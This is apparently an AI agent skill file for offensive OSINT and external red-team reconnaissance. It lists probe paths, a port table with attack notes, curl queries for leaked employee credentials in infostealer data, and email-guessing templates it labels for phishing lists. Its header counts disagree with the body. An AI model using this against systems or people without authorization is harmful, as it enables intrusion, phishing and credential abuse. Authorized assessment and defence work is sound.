offensive-osint

By Undermybelt. Updated 6/7/2026

name: offensive-osint
description: "Operational arsenal for external red-team and bug-bounty reconnaissance. Concrete wordlists (28 Swagger paths, 13 GraphQL paths, 35 high-risk ports, 6 missing-header findings, 15 always-on HTTP checks, 5 SAML paths, cloud bucket permutations, JS guess-paths, vendor product fingerprints for Citrix/F5/Pulse/Fortinet/Cisco/PaloAlto/VMware/Exchange, cloud-native service fingerprints, container/K8s exposure paths, CI/CD platform paths, documentation/wiki leak paths, WHOIS/RDAP, DNS record catalog, Wayback CDX recipes), 43+-pattern secret-regex catalog (incl. modern AI API keys: Anthropic/OpenAI/HuggingFace/Cloudflare/DigitalOcean/npm/PyPI/Docker Hub/Atlassian/DataDog/Sentry/ngrok), 80+ dork corpus across 9 categories, GitHub code-search dorks, copy-paste curl/httpie probes for every check, post-discovery enumeration workflows (AWS/GitHub/Slack/JWT/PMAK/Anthropic/OpenAI), endpoint interest scoring rubric (0–100), mobile app ownership confidence, identity-fabric endpoints (Entra/Okta/ADFS/Google/SAML/M365 Teams+SharePoint+OneDrive+OAuth + user-enum), GraphQL field-suggestion enumeration when introspection disabled, 9 read-only secret validators (Postman/AWS/GitHub/Slack/Anthropic/OpenAI/npm/Atlassian/DataDog), Postman workspace search (verified endpoint), Stack Exchange sweep, public SaaS dorks, email security analysis (SPF/DMARC/DKIM/BIMI/MTA-STS/DNSSEC), origin-discovery / CDN bypass techniques, TLS deep audit (sslyze/testssl.sh/JA3/JA4), reverse-DNS sweep + IPv6 enum, vulnerability prioritization data sources (NVD/EPSS/CISA KEV/ExploitDB/Metasploit), 27 attack-path hint templates, 80+ severity-matrix examples, LinkedIn employee enumeration, job posting tech-stack analysis, Slack/Discord workspace discovery, package registry leak hunting (npm/PyPI/Docker Hub/Quay/GHCR), sat imagery for physical recon, tooling quick-install one-liners, sector-specific recon notes (healthcare/finance/ICS-SCADA/IoT/government), runnable stdlib-only secret_scan.py helper, plus the existing tool references for username/email/phone/people/social/breach/infrastructure/crypto/media/geospatial/AI/archiving/automation. Use when you need concrete probe paths, regexes, payloads, scoring rules, curl one-liners, and tool URLs for an authorized external recon engagement."
version: 2.1.1
triggers:
  - external recon
  - external red team
  - red team external
  - attack surface management
  - ASM
  - bug bounty recon
  - bug bounty
  - reconnaissance
  - footprinting
  - asset discovery
  - swagger discovery
  - openapi discovery
  - graphql introspection
  - graphql discovery
  - subdomain enumeration
  - subdomain takeover
  - cloud bucket enumeration
  - bucket enum
  - S3 enum
  - GCS enum
  - Azure blob enum
  - identity fabric
  - SSO discovery
  - IdP fingerprinting
  - tenant fingerprinting
  - okta enum
  - entra enum
  - azure AD enum
  - ADFS enum
  - SAML metadata
  - mobile recon
  - APK analysis
  - mobile attack surface
  - secret scanning
  - secret leak
  - leaked credential
  - github dorking
  - google dorking
  - bing dorking
  - DDG dorking
  - postman workspace
  - stack exchange OSINT
  - breach lookup
  - have I been pwned
  - HudsonRock cavalier
  - infostealer
  - dehashed
  - intelx
  - shodan recon
  - censys recon
  - certificate transparency
  - crt.sh
  - JARM
  - favicon mmh3
  - JS endpoint extraction
  - sourcemap leak
  - copy paste probes
  - curl one-liner
  - email security analysis
  - SPF DMARC DKIM
  - origin discovery
  - CDN bypass
  - WAF bypass
  - vendor product fingerprints
  - Citrix Netscaler
  - F5 BIG-IP
  - Pulse Secure
  - FortiGate
  - PaloAlto GlobalProtect
  - Cisco AnyConnect
  - VMware vCenter
  - cloud native fingerprint
  - Lambda function URL
  - Cloud Run
  - kubernetes exposure
  - kubelet
  - etcd
  - CI CD exposure
  - Jenkins recon
  - GitLab self-hosted
  - GitHub Actions secrets
  - documentation leak
  - Notion public
  - Confluence anonymous
  - Trello board
  - WHOIS RDAP
  - DNS record catalog
  - Wayback CDX
  - LinkedIn enumeration
  - job posting tech stack
  - Slack workspace discovery
  - Discord server discovery
  - npm token leak
  - PyPI token leak
  - Docker Hub leak
  - sat imagery physical recon
  - TLS deep audit
  - JA3 JA4
  - reverse DNS sweep
  - IPv6 enumeration
  - CVE prioritization
  - EPSS scoring
  - CISA KEV
  - vulnerability prioritization
  - tooling install
  - sector specific recon
  - healthcare DICOM
  - finance SWIFT
  - ICS SCADA
  - Modbus
  - BACnet
  - post discovery workflow
  - JWT triage
  - AWS key triage
  - GraphQL field suggestion
  - Anthropic API key
  - OpenAI API key
  - Microsoft 365 deep
  - Teams federation
  - SharePoint enum
  - OneDrive enum
  - hackerone reference
  - h1 hacktivity
  - disclosed reports
  - community bug reports
  - prior disclosures
  - bug bounty reference

Offensive OSINT — External Red-Team Arsenal

Companion skill: osint-methodology (the "how to think" skill). This skill is the "what to reach for." Use them together.

0. When to use / When NOT

Use this skill when:

  • You need concrete probe paths, wordlists, regexes, payloads, scoring rules, or tool URLs.
  • You're executing reconnaissance and need the actual technical reference (vs. methodology).
  • You're building a recon automation and need specific lists to seed it.

Do NOT use this skill when:

  • The user is asking for active exploitation, post-exploitation, or anything past reconnaissance.
  • The user is asking for defensive / blue-team detections.
  • The target's authorization isn't established — see §1.

1. Authorization & Legal Posture

Use only against assets the operator owns or has written authorization to assess. Run a soft scope check before acting against an unverified third-party target; see methodology skill §1 for the full posture.


2. Confidence Levels

  • TENTATIVE — plausible based on indirect evidence (snippet-only dork match, single-source asset, inferred email pattern).
  • FIRM — directly observed (subdomain resolves, HEAD-confirmed bucket exists, banner returned).
  • CONFIRMED — verified via independent corroboration OR direct verification (live PMAK validation, multiple sources agree, listable bucket with object retrieval).

3. Output Format Conventions

Findings should carry: id, module, asset_key, category, severity (info/low/medium/high/critical), confidence, title, description, evidence (url + UTC timestamp + sha256 + raw ≤ 2 KiB), references, remediation. UTC timestamps everywhere.
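
A minimal sketch of a finding record carrying these fields, assuming Python dataclasses. The names `Finding`, `make_evidence`, and `RAW_CAP` are hypothetical and not part of the skill; only the field list and the 2 KiB cap come from the text above.

```python
import hashlib
import json
from dataclasses import dataclass, field, asdict
from datetime import datetime, timezone

RAW_CAP = 2048  # 2 KiB cap on stored raw evidence (hypothetical constant name)


def make_evidence(url: str, body: bytes) -> dict:
    """Evidence dict: url, UTC timestamp, sha256 of the full body, raw capped at 2 KiB."""
    return {
        "url": url,
        "timestamp": datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
        "sha256": hashlib.sha256(body).hexdigest(),
        "raw": body[:RAW_CAP].decode("utf-8", errors="replace"),
    }


@dataclass
class Finding:
    id: str
    module: str
    asset_key: str
    category: str
    severity: str    # info / low / medium / high / critical
    confidence: str  # TENTATIVE / FIRM / CONFIRMED
    title: str
    description: str
    evidence: dict
    references: list = field(default_factory=list)
    remediation: str = ""

    def to_jsonl(self) -> str:
        """One JSON object per line, suitable for a JSONL run log."""
        return json.dumps(asdict(self), sort_keys=True)
```

The hash is taken over the full body before truncation, so the stored digest still identifies the original response even though only the first 2 KiB is kept.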


4. Source Hygiene & Citations

Record URL + UTC timestamp + SHA-256 + tool version + run_id for every artifact. Keep PNG screenshots, JSONL run logs, and raw HTTP captures with bodies capped at 2 KiB.


5. Do NOT

  • Don't paste creds/PII/session tokens into cloud LLMs.
  • Don't run destructive probes outside DEEP/--aggressive.
  • Don't use validated credentials for anything except read-only liveness check.
  • Don't single-source attribute.
  • Don't assume vendor labels are ground truth.

6. General OSINT (curated tool refs)

7. Search Engines

Tool | Notes
Carrot2 | Clusters results by topic
etools | Metasearch
Kagi | Privacy-first, non-personalized
Brave Search | Independent index; Goggles for custom ranking
PDF Search | PDF + table of contents
Google Fact Check Explorer | Cross-site fact-check

8. Username & Email Investigation

Tool | Purpose
Sherlock | Username search across social networks
Maigret | Profile collector by username
What's My Name | Username search
Holehe | Email registration check
Epieos | Email pivots and metadata
OSINT Industries | Email/username/phone lookups
Hunter.io | Domain → emails
EmailRep | Email reputation
Emailable | Email verification
Mugetsu | X/Twitter username history
RocketReach / Apollo | Email enrichment + pattern guessing
PhoneInfoga | Phone number intelligence

Browser extensions: GetProspect, SignalHire.


9. People Search


10. Phone Number OSINT


11. Email-Pattern Inference (TENTATIVE candidates)

Given a (first_name, last_name, domain), generate these 8 candidate addresses for breach pre-hits, phishing list curation, and downstream enrichment. Mark as TENTATIVE confidence until corroborated.

{first}.{last}@{domain}        # john.doe@example.com
{first}{last}@{domain}         # johndoe@example.com
{first}@{domain}               # john@example.com
{first[0]}{last}@{domain}      # jdoe@example.com
{first}.{last[0]}@{domain}     # john.d@example.com
{last}@{domain}                # doe@example.com
{first}_{last}@{domain}        # john_doe@example.com
{first}-{last}@{domain}        # john-doe@example.com

Lowercase before lookup. Strip diacritics for ASCII fallback. If the org uses a known pattern (e.g., Hunter.io shows {first}.{last} is dominant), prioritize that one and mark FIRM.
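
The eight templates can be sketched as a small generator. This assumes non-empty first and last names; `ascii_fold` and `email_candidates` are hypothetical helper names, and the diacritic handling only covers characters that decompose under NFKD (letters such as "ø" or "ß" pass through unchanged).

```python
import unicodedata


def ascii_fold(name: str) -> str:
    """Lowercase, then strip diacritics via NFKD decomposition."""
    decomposed = unicodedata.normalize("NFKD", name.lower())
    return "".join(ch for ch in decomposed if not unicodedata.combining(ch))


def email_candidates(first: str, last: str, domain: str) -> list[str]:
    """Return the 8 TENTATIVE candidate addresses, in the order listed above."""
    f, l, d = ascii_fold(first), ascii_fold(last), domain.lower()
    local_parts = [
        f"{f}.{l}",     # john.doe
        f"{f}{l}",      # johndoe
        f,              # john
        f"{f[0]}{l}",   # jdoe
        f"{f}.{l[0]}",  # john.d
        l,              # doe
        f"{f}_{l}",     # john_doe
        f"{f}-{l}",     # john-doe
    ]
    return [f"{local}@{d}" for local in local_parts]


for address in email_candidates("José", "Núñez", "Example.com"):
    print(address)
```

Reordering the output so the organization's dominant pattern comes first is left to the caller, since that depends on the corroborating source.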


12. Email-Harvest Source Stack

Six parallel sources, dedup at the end:

  1. IntelX phonebook API — 2-step search + poll. Largest single source for breach-era addresses.
  2. Hunter.io — domain-search endpoint. ~25 free/month. Returns verified emails + roles.
  3. crt.sh — extract rfc822Name entries from X.509 SAN extensions (and emailAddress values in the subject). Some certs include admin/contact emails.
  4. DuckDuckGo SERP scrape — HTML scrape of "@{target-domain}" results.
  5. Bing SERP scrape — same query, complementary index.
  6. Wayback CDX — historic snapshots of the target's homepage / contact / about pages often contain emails removed from the live site.

Email regex:

\b[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}\b

Noise filter (reject numeric-only locals):

^[0-9]+$

(Discards garbage like 12345@example.com from random tokens.)
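
A short sketch of how the two regexes combine at the dedup step. The restriction to the target domain and its subdomains is an assumption added here for illustration, and `harvest_emails` is a hypothetical name.

```python
import re

EMAIL_RE = re.compile(r"\b[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}\b")
NUMERIC_LOCAL_RE = re.compile(r"^[0-9]+$")


def harvest_emails(text: str, domain: str) -> list[str]:
    """Extract, lowercase, filter, and dedup addresses for one target domain."""
    domain = domain.lower()
    found = set()
    for match in EMAIL_RE.findall(text):
        email = match.lower()
        local, _, host = email.rpartition("@")
        # Assumption: keep only the target domain and its subdomains.
        if host != domain and not host.endswith("." + domain):
            continue
        # Noise filter: reject numeric-only local parts.
        if NUMERIC_LOCAL_RE.match(local):
            continue
        found.add(email)
    return sorted(found)


sample = "Contact Alice@Example.com or 12345@example.com, bob@mail.example.com; eve@other.org"
print(harvest_emails(sample, "example.com"))
```

Running each source's raw output through the same function before merging keeps the final dedup a plain set union.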


13. Social Media

Platform | Tool
Instagram | Picuki — profile view without account
X/Twitter | snscrape — preferred CLI scraper; Twint as fallback
Facebook | Graph Search, sowsearch.info, lookup-id.com, whopostedwhat.com
Facebook (research) | Meta Content Library — CrowdTangle successor (researcher-gated)
YouTube/Twitch | Social Blade — analytics
TikTok | Tokboard — trends + profile analytics
Reddit | Reveddit — removed content; RedTrack.social — user history
Bluesky | Firesky — real-time firehose; SkyView — follower graphs
Mastodon | FediSearch — cross-instance search; Fedifinder — find Twitter users on Mastodon
Faces | Search4Faces

14. Public Records & Company Information

14.1 RU registries

Rusprofile, Kontur.Focus (freemium), zakupki.gov.ru (procurement), EGRUL/EGRIP (official, captcha-gated).

14.2 CN registries + USCC + ICP

  • GSXT (gsxt.gov.cn): National Enterprise Credit Info; cross-check with Tianyancha / Qichacha.
  • USCC (Unified Social Credit Code): 18-character entity ID assigned to all CN legal entities. Format: <authority:1><type:1><region:6><org-code:9><check:1>. Useful for joining GSXT records to ICP filings.
  • ICP Beian (beian.miit.gov.cn): every domain serving traffic in mainland CN must register an ICP filing; the filing links the domain to a USCC, which links to the legal entity in GSXT.
  • Workflow: target.cn domain → ICP lookup → USCC → GSXT → entity name + officers + adjacent registered entities.

14.3 Sanctions & Compliance


15. Breach & Leak Data

15.0.1 HudsonRock Cavalier — direct API recipe

The web UI wraps a public, unauthenticated JSON API. Hit it directly:

# By domain (canonical first call)
curl -sk -m 30 "https://cavalier.hudsonrock.com/api/json/v2/osint-tools/search-by-domain?domain=target.com" | jq .

# By email (single-account check)
curl -sk -m 30 "https://cavalier.hudsonrock.com/api/json/v2/osint-tools/search-by-email?email=alice@target.com" | jq .

# By URL (when target's app is the breach victim)
curl -sk -m 30 "https://cavalier.hudsonrock.com/api/json/v2/osint-tools/search-by-url?url=https://app.target.com" | jq .

PowerShell:

$D  = "target.com"   # domain under assessment
$hr = Invoke-RestMethod -Uri "https://cavalier.hudsonrock.com/api/json/v2/osint-tools/search-by-domain?domain=$D" -TimeoutSec 30
"Employees: $($hr.employees) | Users: $($hr.users) | Third-party: $($hr.third_parties) | Total: $($hr.total)"
$hr.data.employees_urls | Sort-Object -Property occurrence -Descending | Select-Object -First 20
$hr.data.clients_urls   | Sort-Object -Property occurrence -Descending | Select-Object -First 15

Top-level JSON fields:

  • total — total stealer entries touching this domain.
  • totalStealers — global stealer-log corpus size (context only).
  • employees — count of <*>@<domain> accounts found.
  • users — count of accounts where the domain appeared as a visited URL (customers/vendors).
  • third_parties — accounts touching adjacent domains in the org.
  • data.employees_urls[]{occurrence, type, url} — internal apps where employees were logging in when stolen. Subdomain hits here = recon gold.
  • data.clients_urls[] — same shape; user-facing apps (often reveals undocumented public portals).
  • data.stealer_families[]{_key, _value} → which stealer (RedLine / Lumma / StealC / Vidar / Raccoon).
  • data.dates_compromised[]{_key, _value} → temporal distribution.

Free-tier caveats (CRITICAL to know):

  • Subdomain hostnames in data.*_urls[] past the first few are redacted with asterisks (*****.target.com). Pivot to paid Cavalier tier or other sources for unredacted.
  • Free endpoint returns counts + sample URLs only. Cleartext passwords + emails are never in the free response.
  • Rate limit ~1 req/sec/IP; 429 on burst. Sleep 1s between calls.
  • For unredacted creds + bulk enumeration → paid Cavalier portal.

Severity mapping (per §15.1 + §15.2): employees ≥ 10 → CRITICAL, regardless of whether the breached service is still online. When a legacy Lotus Domino or on-prem mail host was decommissioned during a cloud SSO migration, employees often carry the same passwords over, so SSO_EXPOSURE still escalates to CRITICAL.

15.1 Domain-Level Breach Severity Mapping

When you query a breach corpus by domain, map the result to severity like so:

Stat | Severity
≥ 10 employees compromised | CRITICAL
1–9 employees compromised | HIGH
≥ 1 end-user (non-employee) compromised | MEDIUM
Domain seen in breach with 0 named accounts | INFO

Employees vs end-users distinction: an employee account is <anything>@<target-domain> (the breach victim is the target's own staff). An end-user account is the target's customer who reused a password — useful for credential-stuffing risk awareness but not directly compromising the target's identity fabric.
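
The mapping table reduces to a first-match rule chain. A minimal sketch, assuming the counts have already been pulled from the breach source (for HudsonRock, the `employees` and `users` fields); `breach_severity` is a hypothetical name.

```python
from typing import Optional


def breach_severity(employees: int, users: int, domain_seen: bool = True) -> Optional[str]:
    """Map domain-level breach counts to a severity; the first matching rule wins."""
    if employees >= 10:
        return "CRITICAL"
    if employees >= 1:
        return "HIGH"
    if users >= 1:
        return "MEDIUM"
    # Domain appears in the corpus but no named accounts were returned.
    return "INFO" if domain_seen else None


print(breach_severity(employees=14, users=230))
print(breach_severity(employees=0, users=3))
```

Employee counts are checked first because an employee hit outranks any number of end-user hits.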

15.2 SSO_EXPOSURE finding

When a discovered SSO tenant (Entra GUID / Okta slug / Google Workspace domain) intersects with the breach corpus on its domain → SSO_EXPOSURE finding, severity CRITICAL. Evidence: tenant ID + product + employee count + per-account source attribution.

Legacy-mail-decommissioned pattern (high-value variant):

If mail.<domain> / webmail.<domain> returns NXDOMAIN today but HudsonRock/HIBP corpus still has historical employee credentials against it AND autodiscover.<domain> resolves to Microsoft IPs (M365) or aspmx.l.google.com MX (Workspace), the org migrated from on-prem to cloud, and the stolen passwords may well have survived the migration via password reuse. Escalate to CRITICAL SSO_EXPOSURE even when the legacy host is dead.

Concrete triggers (all three together):

  1. Resolve-DnsName mail.<domain> -Type A → NXDOMAIN (legacy gone)
  2. HudsonRock corpus has employee URLs against the old host (e.g. mail.<domain>/names.nsf for Lotus Domino, mail.<domain>/owa/ for Exchange, mail.<domain>/iwaredir.nsf for iNotes, mail.<domain>/zimbra/ for Zimbra)
  3. Current MX → M365 / Google Workspace / Zoho cloud (DNS confirms migration)

Evidence pack: tenant GUID + breach count + 3+ legacy URLs from corpus + autodiscover Microsoft IPs + current MX. Recommend forced password rotation + MFA audit + Conditional Access review.
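
The three-trigger test can be sketched offline once the DNS and corpus lookups are done. Everything here is illustrative: the MX suffix table is an assumption (providers use more hostnames than these), and `mx_provider` and `legacy_mail_sso_exposure` are hypothetical names.

```python
# Assumed MX suffixes per provider; extend from live observations.
MX_SUFFIXES = {
    ".mail.protection.outlook.com": "M365",
    ".google.com": "Google Workspace",
    ".googlemail.com": "Google Workspace",
    ".zoho.com": "Zoho",
}
# URL markers for the legacy mail products named in trigger 2.
LEGACY_MARKERS = ("/names.nsf", "/owa/", "/iwaredir.nsf", "/zimbra/")


def mx_provider(mx_hosts):
    """Return the first cloud mail provider matched by any MX host, else None."""
    for host in mx_hosts:
        host = host.rstrip(".").lower()
        for suffix, provider in MX_SUFFIXES.items():
            if host.endswith(suffix):
                return provider
    return None


def legacy_mail_sso_exposure(legacy_nxdomain, corpus_urls, mx_hosts):
    """True only when all three triggers hold together."""
    has_legacy_urls = any(
        marker in url.lower() for url in corpus_urls for marker in LEGACY_MARKERS
    )
    return bool(legacy_nxdomain and has_legacy_urls and mx_provider(mx_hosts))


print(legacy_mail_sso_exposure(
    True,
    ["https://mail.target.example/owa/auth/logon.aspx"],
    ["target-example.mail.protection.outlook.com."],
))
```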


16. Pre-built Wordlists & Probe Paths

Copy-pasteable arsenals, severity-annotated where relevant.

16.1 Swagger / OpenAPI discovery — 27 paths

Probe each path on every alive webapp. GET (or HEAD if rate-limited).

swagger.json
swagger.yaml
swagger/v1/swagger.json
swagger/v2/swagger.json
swagger-ui.html
swagger-ui/
swagger-resources
api-docs
api-docs.json
api/swagger
api/swagger.json
api/swagger-ui.html
api/v1/swagger.json
api/v2/swagger.json
api/v3/api-docs
v2/api-docs
v3/api-docs
openapi.json
openapi.yaml
openapi/v1
openapi/v3
docs
redoc
rapidoc
api/docs
api/documentation
.well-known/openapi

Severity:

  • Reachable Swagger/OpenAPI spec without auth → HIGH LEAKY_API_SPEC (full endpoint enumeration leaks; often reveals undocumented internal APIs).
  • Behind auth but accessible to any authenticated user → MEDIUM (still discloses internal API surface).
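
A 200 on one of these paths is not proof of a spec, since many apps return a catch-all page. The sketch below checks that a JSON body actually looks like a Swagger 2 / OpenAPI 3 document and lists its operations. It is a heuristic under stated assumptions: YAML specs and HTML UIs are not handled, and `looks_like_openapi` and `list_operations` are hypothetical names.

```python
import json

HTTP_METHODS = {"get", "put", "post", "delete", "options", "head", "patch", "trace"}


def looks_like_openapi(body: str) -> bool:
    """Heuristic: a JSON object with a 'swagger' or 'openapi' key and a 'paths' object."""
    try:
        doc = json.loads(body)
    except ValueError:
        return False
    return (
        isinstance(doc, dict)
        and ("swagger" in doc or "openapi" in doc)
        and isinstance(doc.get("paths"), dict)
    )


def list_operations(body: str) -> list:
    """Return sorted (METHOD, path) pairs declared by the spec."""
    doc = json.loads(body)
    operations = []
    for path, item in doc.get("paths", {}).items():
        for key in item:
            if key.lower() in HTTP_METHODS:
                operations.append((key.upper(), path))
    return sorted(operations)


spec = json.dumps({
    "openapi": "3.0.3",
    "paths": {
        "/users": {"get": {}, "post": {}},
        "/internal/debug": {"get": {}, "parameters": []},
    },
})
print(looks_like_openapi(spec), list_operations(spec))
```

The operation list is what goes into the evidence for a LEAKY_API_SPEC finding; it shows the disclosed surface without calling any of the endpoints.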

16.2 GraphQL discovery — 13 paths

graphql
graphiql
api/graphql
v1/graphql
v2/graphql
query
api/query
gql
altair
playground
subscriptions
graphql/console
api/v1/graphql

Standard introspection POST body:

{
  "operationName": "IntrospectionQuery",
  "query": "query IntrospectionQuery { __schema { types { name kind fields { name type { name kind } } } queryType { name } mutationType { name } subscriptionType { name } } }"
}

Severity:

  • Introspection returns schema without auth → HIGH OPEN_GRAPHQL_API.
  • Field-suggestion enumeration possible (server returns "did you mean" for typo'd field names) → MEDIUM (re-derive partial schema even when introspection is disabled).
  • /graphql accepts batched queries ([...] request body) → MEDIUM (rate-limit bypass surface; auth bypass via mixed batches).

UI markers (lower severity but still discoverable):

  • HTML response contains graphiql, playground, apollo studio, altair → GraphiQL UI exposed (often shipped accidentally on prod).
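
For the field-suggestion case, a sketch of pulling suggested names out of an error response. It assumes the graphql-js message wording (`Did you mean "user" or "users"?`); other servers phrase suggestions differently, and `suggested_fields` is a hypothetical name.

```python
import re

SUGGESTION_RE = re.compile(r"Did you mean (.+?)\?")
NAME_RE = re.compile(r'"([A-Za-z_][A-Za-z0-9_]*)"')


def suggested_fields(response: dict) -> set:
    """Collect every field name offered in 'Did you mean ...?' error messages."""
    names = set()
    for error in response.get("errors", []):
        match = SUGGESTION_RE.search(error.get("message", ""))
        if match:
            names.update(NAME_RE.findall(match.group(1)))
    return names


response = {
    "errors": [
        {"message": 'Cannot query field "usr" on type "Query". Did you mean "user" or "users"?'},
        {"message": 'Cannot query field "zzz" on type "Query".'},
    ]
}
print(sorted(suggested_fields(response)))
```

Only the text after "Did you mean" is scanned, so the typo'd field and the type name quoted earlier in the message are not mistaken for suggestions.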

16.3 High-risk ports — 44 services

For each open port, emit a finding with the severity and "why an attacker cares" below. Source for the open-port observation: Shodan InternetDB (free, 1 req/sec) is the recommended starting point.

Port | Service | Severity | Why it matters
21 | FTP | HIGH | Anonymous read often enabled; cleartext creds.
22 | SSH | LOW | Banner discloses version; brute-force surface.
23 | Telnet | HIGH | Cleartext protocol; should never be exposed.
25 | SMTP | LOW | Open relay risk; version banner.
53 | DNS | LOW | Recursion = DDoS amplifier; AXFR opportunism.
80 | HTTP | INFO | Standard.
110 | POP3 | LOW | Cleartext if no STARTTLS.
111 | rpcbind | MEDIUM | NFS exports enumeration.
135 | MS RPC | HIGH | Enum via Impacket.
139 | NetBIOS-SSN | HIGH | File/printer enum.
143 | IMAP | LOW | Cleartext if no STARTTLS.
161 | SNMP | HIGH | Community strings often public/private; full device enum.
389 | LDAP | HIGH | Anonymous bind = full directory dump.
443 | HTTPS | INFO | Standard.
445 | SMB | CRITICAL | EternalBlue, SMB relay, anonymous shares.
465 | SMTPS | LOW | Banner.
514 | rsyslog | MEDIUM | Log injection / DoS.
587 | SMTP-MSA | LOW | Banner.
631 | IPP/CUPS | MEDIUM | Print server enum / RCE in old CUPS.
873 | rsync | HIGH | Modules often listable; backup data exposure.
1433 | MSSQL | HIGH | Brute-force; xp_cmdshell.
1521 | Oracle TNS | HIGH | Brute-force; SID enum.
2049 | NFS | HIGH | World-readable exports.
2375 | Docker API (unencrypted) | CRITICAL | Unauthenticated container/host takeover.
2376 | Docker API (TLS) | HIGH | Cert validation bypass risk.
3000 | Common dev / Grafana | MEDIUM | Often Grafana / Express dev with default creds.
3306 | MySQL | HIGH | Brute-force; default root:"".
3389 | RDP | CRITICAL | BlueKeep / DejaBlue / NLA bypass.
5432 | PostgreSQL | HIGH | Brute-force; default postgres:postgres.
5601 | Kibana | HIGH | Often unauthenticated; Elasticsearch pivot.
5900 | VNC | HIGH | Often unauthenticated or weak password.
5984 | CouchDB | HIGH | Default no auth; admin party.
6379 | Redis | CRITICAL | No auth default; write authorized_keys for SSH.
7001 | WebLogic | HIGH | Frequent CVEs (CVE-2020-14882, etc.).
8000 | Common dev | MEDIUM | Django, common dev servers.
8080 | HTTP-alt | MEDIUM | Tomcat, Jenkins, common proxy.
8443 | HTTPS-alt | MEDIUM | Same as 8080.
8888 | Common dev / Jupyter | HIGH | Jupyter often exposes interactive shell.
9090 | Cockpit / Prometheus | HIGH | Server admin UI / metrics scraping.
9200 | Elasticsearch | CRITICAL | Typically no auth.
9300 | Elasticsearch transport | HIGH | Cluster join + RCE.
11211 | memcached | MEDIUM | UDP DDoS amp; data dump.
27017 | MongoDB | CRITICAL | No auth by default.
50070 | Hadoop NameNode | HIGH | HDFS browse.

When Shodan InternetDB returns a non-empty vulns[] for the host (the list is per IP, not per port), escalate the severity of that host's port findings by one tier and include the CVE list in evidence.
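
A sketch of the one-tier escalation applied to an InternetDB-shaped record (`ip`, `ports`, `vulns`). InternetDB reports `vulns` for the host as a whole, so this sketch escalates every known port on that host. `PORT_SEVERITY` is a small subset of the table above, and the function names are hypothetical.

```python
TIERS = ["INFO", "LOW", "MEDIUM", "HIGH", "CRITICAL"]

# Subset of the port table, for illustration only.
PORT_SEVERITY = {
    22: ("SSH", "LOW"),
    80: ("HTTP", "INFO"),
    445: ("SMB", "CRITICAL"),
    6379: ("Redis", "CRITICAL"),
    9200: ("Elasticsearch", "CRITICAL"),
}


def escalate(severity: str) -> str:
    """Raise severity by one tier, capped at CRITICAL."""
    return TIERS[min(TIERS.index(severity) + 1, len(TIERS) - 1)]


def port_findings(record: dict) -> list:
    """Turn one InternetDB-style record into per-port findings."""
    cves = sorted(record.get("vulns", []))
    findings = []
    for port in record.get("ports", []):
        if port not in PORT_SEVERITY:
            continue  # not in the high-risk table
        service, severity = PORT_SEVERITY[port]
        if cves:
            severity = escalate(severity)
        findings.append({
            "asset": record.get("ip"),
            "port": port,
            "service": service,
            "severity": severity,
            "cves": cves,
        })
    return findings


record = {"ip": "198.51.100.7", "ports": [22, 80, 6379, 12345], "vulns": ["CVE-2020-0001"]}
for finding in port_findings(record):
    print(finding["port"], finding["service"], finding["severity"])
```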

16.4 Missing security headers — 6 findings

For every alive webapp, audit response headers. Each missing header below = one finding.

Header | Severity (default) | Severity (sensitive path) | Notes
Strict-Transport-Security | MEDIUM | HIGH | Sensitive paths: /login, /signin, /sso, /admin, /auth.
Content-Security-Policy | MEDIUM | MEDIUM | XSS impact mitigation gone.
X-Frame-Options | LOW | LOW | Clickjacking. (CSP frame-ancestors is the modern replacement.)
X-Content-Type-Options | LOW | LOW | MIME-sniff XSS.
Referrer-Policy | INFO | INFO | Outbound link leakage.
Permissions-Policy | INFO | INFO | Feature-policy hardening.
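
The header table translates directly into a lookup. A minimal sketch that takes a request path and the response headers and returns one (header, severity) pair per missing header. Treating a path as sensitive when it starts with one of the listed prefixes is an assumption, and `missing_header_findings` is a hypothetical name.

```python
SENSITIVE_PREFIXES = ("/login", "/signin", "/sso", "/admin", "/auth")

# header -> (default severity, severity on a sensitive path)
HEADER_SEVERITY = {
    "Strict-Transport-Security": ("MEDIUM", "HIGH"),
    "Content-Security-Policy": ("MEDIUM", "MEDIUM"),
    "X-Frame-Options": ("LOW", "LOW"),
    "X-Content-Type-Options": ("LOW", "LOW"),
    "Referrer-Policy": ("INFO", "INFO"),
    "Permissions-Policy": ("INFO", "INFO"),
}


def missing_header_findings(path: str, headers: dict) -> list:
    """Return (header, severity) for every audited header absent from the response."""
    present = {name.lower() for name in headers}  # header names are case-insensitive
    sensitive = path.lower().startswith(SENSITIVE_PREFIXES)
    findings = []
    for header, (default, on_sensitive) in HEADER_SEVERITY.items():
        if header.lower() not in present:
            findings.append((header, on_sensitive if sensitive else default))
    return findings


print(missing_header_findings("/login", {"content-security-policy": "default-src 'self'"}))
```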

16.5 Always-on HTTP checks — 15 paths

Run these against every alive webapp regardless of Nuclei availability. Cheap; high signal.

Path | Finding | Severity | Match logic
/.git/config | Exposed .git repo | CRITICAL | Body contains [core], [remote, repositoryformatversion
/.git/HEAD | Exposed .git/HEAD | HIGH | Body matches ^ref:\s
/.env | Exposed .env | CRITICAL | Multiline regex ^\s*[A-Z_][A-Z0-9_]*\s*=
/server-status | Apache server-status | MEDIUM | Body contains Apache Server Status or matching title
/server-info | Apache mod_info | MEDIUM | Body contains Apache Server Information
/.DS_Store | Exposed .DS_Store | LOW | Byte signature \x00\x00\x00\x01Bud1
/phpinfo.php | phpinfo() leak | HIGH | Body contains phpinfo(), PHP Version, or matching title
/info.php | phpinfo() (alt path) | HIGH | Same as above
/actuator/env | Spring Boot /actuator/env | CRITICAL | Body contains "propertySources", systemProperties, systemEnvironment
/actuator/heapdump | Spring Boot heapdump | CRITICAL | HPROF magic bytes / large binary download
/_cat/indices | Elasticsearch open | HIGH | Returns index list
/script | Jenkins script console | HIGH | Body contains Jenkins/Script Console
/manager/html | Tomcat Manager | HIGH | Body contains Tomcat Web Application Manager
/wp-admin/install.php | Orphaned WP install | LOW | Body contains WordPress Installation
/.well-known/security.txt | Disclosure policy info | INFO | Parse contact + policy fields

Plus parse /robots.txt for Disallow: paths — those become the next-tier wordlist for that target.
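
A sketch of the robots.txt step, working on an already-fetched body. Skipping empty values and the bare `/` rule is an assumption made here (neither adds a useful wordlist entry), and `disallow_paths` is a hypothetical name.

```python
def disallow_paths(robots_txt: str) -> list:
    """Return unique Disallow paths in file order, ignoring comments and empty rules."""
    paths = []
    for line in robots_txt.splitlines():
        line = line.split("#", 1)[0].strip()  # drop trailing comments
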